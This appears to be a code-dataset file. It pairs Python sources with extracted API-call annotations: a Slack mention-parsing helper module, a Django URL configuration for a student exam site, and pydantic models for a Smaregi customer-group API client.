| [((303, 396), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (319, 396), False, 'from django.db import migrations, models\n'), ((421, 452), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (437, 452), False, 'from django.db import migrations, models\n'), ((488, 509), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (507, 509), False, 'from django.db import migrations, models\n'), ((541, 572), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (557, 572), False, 'from django.db import migrations, models\n'), ((613, 634), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (632, 634), False, 'from django.db import migrations, models\n'), ((671, 692), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (690, 692), False, 'from django.db import migrations, models\n'), ((722, 832), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'choices': "[(1, 'Very bad'), (2, 'Bad'), (3, 'Regular'), (4, 'Good'), (5, 'Very good')]"}), "(choices=[(1, 'Very bad'), (2, 'Bad'), (3, 'Regular'), (\n 4, 'Good'), (5, 'Very good')])\n", (741, 832), False, 'from django.db import migrations, models\n'), ((857, 878), 'django.db.models.BooleanField', 'models.BooleanField', ([], {}), '()\n', (876, 878), False, 'from django.db import migrations, models\n'), ((918, 936), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (934, 936), False, 'from django.db import migrations, models\n')] |
import re
# regex for a user or channel mention at the beginning of a message
# example matches: " <@UJQ07L30Q> ", "<#C010P8N1ABB|interns>"
# interactive playground: https://regex101.com/r/2Z7eun/2
MENTION_PATTERN = r"(?:^\s?<@(.*?)>\s?)|(?:^\s?<#(.*?)\|.*?>\s?)"
def get_set_element(_set):
"""get the element from the set to which the iterator points; returns an
arbitrary item
"""
for element in _set:
return element
def get_person_from_match(user_id, match):
"""given a Match, return the Person corresponding to the passed user ID
"""
if match.person_1.user_id == user_id:
return match.person_1
elif match.person_2.user_id == user_id:
return match.person_2
else:
raise Exception(f"Person with user ID \"{user_id}\" is not part of "
f"the passed match ({match}).")
def get_other_person_from_match(user_id, match):
"""given a Match, return the Person corresponding to the user who is NOT
the passed user ID (i.e. the other Person)
"""
if match.person_1.user_id == user_id:
return match.person_2
elif match.person_2.user_id == user_id:
return match.person_1
else:
raise Exception(f"Person with user ID \"{user_id}\" is not part of "
f"the passed match ({match}).")
def blockquote(message):
"""return `message` with markdown blockquote formatting (start each line
with "> ")
"""
if message:
return re.sub(r"^", "> ", message, flags=re.MULTILINE)
else:
return None
def get_mention(message):
"""get the user or channel ID mentioned at the beginning of a message, if
any
"""
match = re.search(MENTION_PATTERN, message)
if match:
# return the first not-None value in the match group tuple, be it a
# user or channel mention
# https://stackoverflow.com/a/18533669
return next(group for group in match.group(1, 2) if group is not None)
else:
return None
def remove_mention(message):
"""remove the user or channel mention from the beginning of a message, if
any
"""
return re.sub(MENTION_PATTERN, "", message, count=1)
| [
"re.sub",
"re.search"
]
| [((1683, 1718), 're.search', 're.search', (['MENTION_PATTERN', 'message'], {}), '(MENTION_PATTERN, message)\n', (1692, 1718), False, 'import re\n'), ((2135, 2180), 're.sub', 're.sub', (['MENTION_PATTERN', '""""""', 'message'], {'count': '(1)'}), "(MENTION_PATTERN, '', message, count=1)\n", (2141, 2180), False, 'import re\n'), ((1471, 1517), 're.sub', 're.sub', (['"""^"""', '"""> """', 'message'], {'flags': 're.MULTILINE'}), "('^', '> ', message, flags=re.MULTILINE)\n", (1477, 1517), False, 'import re\n')] |
from django.contrib.auth.views import LoginView
from django.urls import path
from student import views
urlpatterns = [
path('studentclick', views.studentclick_view, name='student-click'),
path('studentlogin', LoginView.as_view(
template_name='student/studentlogin.html'), name='studentlogin'),
path('studentsignup', views.student_signup_view, name='studentsignup'),
path('student-dashboard', views.student_dashboard_view,
name='student-dashboard'),
path('student-check', views.student_check_view, name='student-check'),
path('student-exam', views.student_exam_view, name='student-exam'),
path('take-exam/<int:pk>', views.take_exam_view, name='take-exam'),
path('start-exam/<int:pk>', views.start_exam_view, name='start-exam'),
path('calculate-marks', views.calculate_marks_view, name='calculate-marks'),
path('view-result', views.view_result_view, name='view-result'),
path('check-marks/<int:pk>', views.check_marks_view, name='check-marks'),
path('student-marks', views.student_marks_view, name='student-marks'),
path('expel/<int:pk>', views.student_expel_view, name='expel'),
path('video_feed', views.video_feed, name='video-feed'),
path('train_feed', views.train_feed, name='train-feed'),
path('check_feed', views.check_feed, name='check-feed'),
path('logout', views.student_logout_view, name='student-logout'),
]
| [
"django.contrib.auth.views.LoginView.as_view",
"django.urls.path"
]
| [((125, 192), 'django.urls.path', 'path', (['"""studentclick"""', 'views.studentclick_view'], {'name': '"""student-click"""'}), "('studentclick', views.studentclick_view, name='student-click')\n", (129, 192), False, 'from django.urls import path\n'), ((316, 386), 'django.urls.path', 'path', (['"""studentsignup"""', 'views.student_signup_view'], {'name': '"""studentsignup"""'}), "('studentsignup', views.student_signup_view, name='studentsignup')\n", (320, 386), False, 'from django.urls import path\n'), ((392, 478), 'django.urls.path', 'path', (['"""student-dashboard"""', 'views.student_dashboard_view'], {'name': '"""student-dashboard"""'}), "('student-dashboard', views.student_dashboard_view, name=\n    'student-dashboard')\n", (396, 478), False, 'from django.urls import path\n'), ((488, 557), 'django.urls.path', 'path', (['"""student-check"""', 'views.student_check_view'], {'name': '"""student-check"""'}), "('student-check', views.student_check_view, name='student-check')\n", (492, 557), False, 'from django.urls import path\n'), ((563, 629), 'django.urls.path', 'path', (['"""student-exam"""', 'views.student_exam_view'], {'name': '"""student-exam"""'}), "('student-exam', views.student_exam_view, name='student-exam')\n", (567, 629), False, 'from django.urls import path\n'), ((635, 701), 'django.urls.path', 'path', (['"""take-exam/<int:pk>"""', 'views.take_exam_view'], {'name': '"""take-exam"""'}), "('take-exam/<int:pk>', views.take_exam_view, name='take-exam')\n", (639, 701), False, 'from django.urls import path\n'), ((707, 776), 'django.urls.path', 'path', (['"""start-exam/<int:pk>"""', 'views.start_exam_view'], {'name': '"""start-exam"""'}), "('start-exam/<int:pk>', views.start_exam_view, name='start-exam')\n", (711, 776), False, 'from django.urls import path\n'), ((782, 857), 'django.urls.path', 'path', (['"""calculate-marks"""', 'views.calculate_marks_view'], {'name': '"""calculate-marks"""'}), "('calculate-marks', views.calculate_marks_view, name='calculate-marks')\n", (786, 857), False, 'from django.urls import path\n'), ((863, 926), 'django.urls.path', 'path', (['"""view-result"""', 'views.view_result_view'], {'name': '"""view-result"""'}), "('view-result', views.view_result_view, name='view-result')\n", (867, 926), False, 'from django.urls import path\n'), ((932, 1004), 'django.urls.path', 'path', (['"""check-marks/<int:pk>"""', 'views.check_marks_view'], {'name': '"""check-marks"""'}), "('check-marks/<int:pk>', views.check_marks_view, name='check-marks')\n", (936, 1004), False, 'from django.urls import path\n'), ((1010, 1079), 'django.urls.path', 'path', (['"""student-marks"""', 'views.student_marks_view'], {'name': '"""student-marks"""'}), "('student-marks', views.student_marks_view, name='student-marks')\n", (1014, 1079), False, 'from django.urls import path\n'), ((1085, 1147), 'django.urls.path', 'path', (['"""expel/<int:pk>"""', 'views.student_expel_view'], {'name': '"""expel"""'}), "('expel/<int:pk>', views.student_expel_view, name='expel')\n", (1089, 1147), False, 'from django.urls import path\n'), ((1153, 1208), 'django.urls.path', 'path', (['"""video_feed"""', 'views.video_feed'], {'name': '"""video-feed"""'}), "('video_feed', views.video_feed, name='video-feed')\n", (1157, 1208), False, 'from django.urls import path\n'), ((1214, 1269), 'django.urls.path', 'path', (['"""train_feed"""', 'views.train_feed'], {'name': '"""train-feed"""'}), "('train_feed', views.train_feed, name='train-feed')\n", (1218, 1269), False, 'from django.urls import path\n'), ((1275, 1330), 'django.urls.path', 'path', (['"""check_feed"""', 'views.check_feed'], {'name': '"""check-feed"""'}), "('check_feed', views.check_feed, name='check-feed')\n", (1279, 1330), False, 'from django.urls import path\n'), ((1336, 1400), 'django.urls.path', 'path', (['"""logout"""', 'views.student_logout_view'], {'name': '"""student-logout"""'}), "('logout', views.student_logout_view, name='student-logout')\n", (1340, 1400), False, 'from django.urls import path\n'), ((219, 279), 'django.contrib.auth.views.LoginView.as_view', 'LoginView.as_view', ([], {'template_name': '"""student/studentlogin.html"""'}), "(template_name='student/studentlogin.html')\n", (236, 279), False, 'from django.contrib.auth.views import LoginView\n')]
import datetime
from pydantic import Field
from typing import (
ClassVar,
List,
Dict,
Optional,
)
from smaregipy.base_api import (
BaseServiceRecordApi,
BaseServiceCollectionApi,
)
from smaregipy.utils import NoData, DictUtil
class CustomerGroup(BaseServiceRecordApi):
RECORD_NAME = 'customer_groups'
ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_id']
customer_group_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
label: Optional[str] = Field(default_factory=NoData)
display_flag: Optional[bool] = Field(default_factory=NoData)
display_sequence: Optional[int] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
class CustomerGroupCollection(BaseServiceCollectionApi[CustomerGroup]):
RECORD_NAME = 'customer_groups'
COLLECT_MODEL = CustomerGroup
WITH: ClassVar[List[str]] = []
class CustomerGroupSection(BaseServiceRecordApi):
RECORD_NAME = 'customer_group_sections'
ID_PROPERTY_NAME: ClassVar[str] = 'customer_group_section_id'
REQUEST_EXCLUDE_KEY: ClassVar[List[str]] = ['customer_group_section_id']
customer_group_section_id: Optional[int] = Field(default_factory=NoData)
customer_group_section_label: Optional[str] = Field(default_factory=NoData)
ins_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
upd_date_time: Optional[datetime.datetime] = Field(default_factory=NoData)
async def save(self: 'CustomerGroupSection') -> 'CustomerGroupSection':
"""
        Updates the customer group section.
        Overrides the save method because this update is sent as a PUT request.
"""
uri = self._get_uri(self._path_params)
header = self._get_header()
response = self._api_put(uri, header, self.to_api_request_body())
response_data: Dict = DictUtil.convert_key_to_snake(response[self.Response.KEY_DATA])
response_model = self.__class__(**response_data)
self.copy_all_fields(response_model)
self.id(getattr(self, self.ID_PROPERTY_NAME))
self._status=self.DataStatus.SAVED
return self
class CustomerGroupSectionCollection(BaseServiceCollectionApi[CustomerGroupSection]):
RECORD_NAME = 'customer_group_sections'
COLLECT_MODEL = CustomerGroupSection
WITH: ClassVar[List[str]] = []
| [
"smaregipy.utils.DictUtil.convert_key_to_snake",
"pydantic.Field"
]
| [((499, 528), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (504, 528), False, 'from pydantic import Field\n'), ((576, 605), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (581, 605), False, 'from pydantic import Field\n'), ((633, 662), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (638, 662), False, 'from pydantic import Field\n'), ((698, 727), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (703, 727), False, 'from pydantic import Field\n'), ((766, 795), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (771, 795), False, 'from pydantic import Field\n'), ((845, 874), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (850, 874), False, 'from pydantic import Field\n'), ((925, 954), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (930, 954), False, 'from pydantic import Field\n'), ((1422, 1451), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1427, 1451), False, 'from pydantic import Field\n'), ((1502, 1531), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1507, 1531), False, 'from pydantic import Field\n'), ((1581, 1610), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1586, 1610), False, 'from pydantic import Field\n'), ((1661, 1690), 'pydantic.Field', 'Field', ([], {'default_factory': 'NoData'}), '(default_factory=NoData)\n', (1666, 1690), False, 'from pydantic import Field\n'), ((2048, 2111), 'smaregipy.utils.DictUtil.convert_key_to_snake', 'DictUtil.convert_key_to_snake', (['response[self.Response.KEY_DATA]'], {}), '(response[self.Response.KEY_DATA])\n', (2077, 2111), False, 'from smaregipy.utils import NoData, DictUtil\n')] |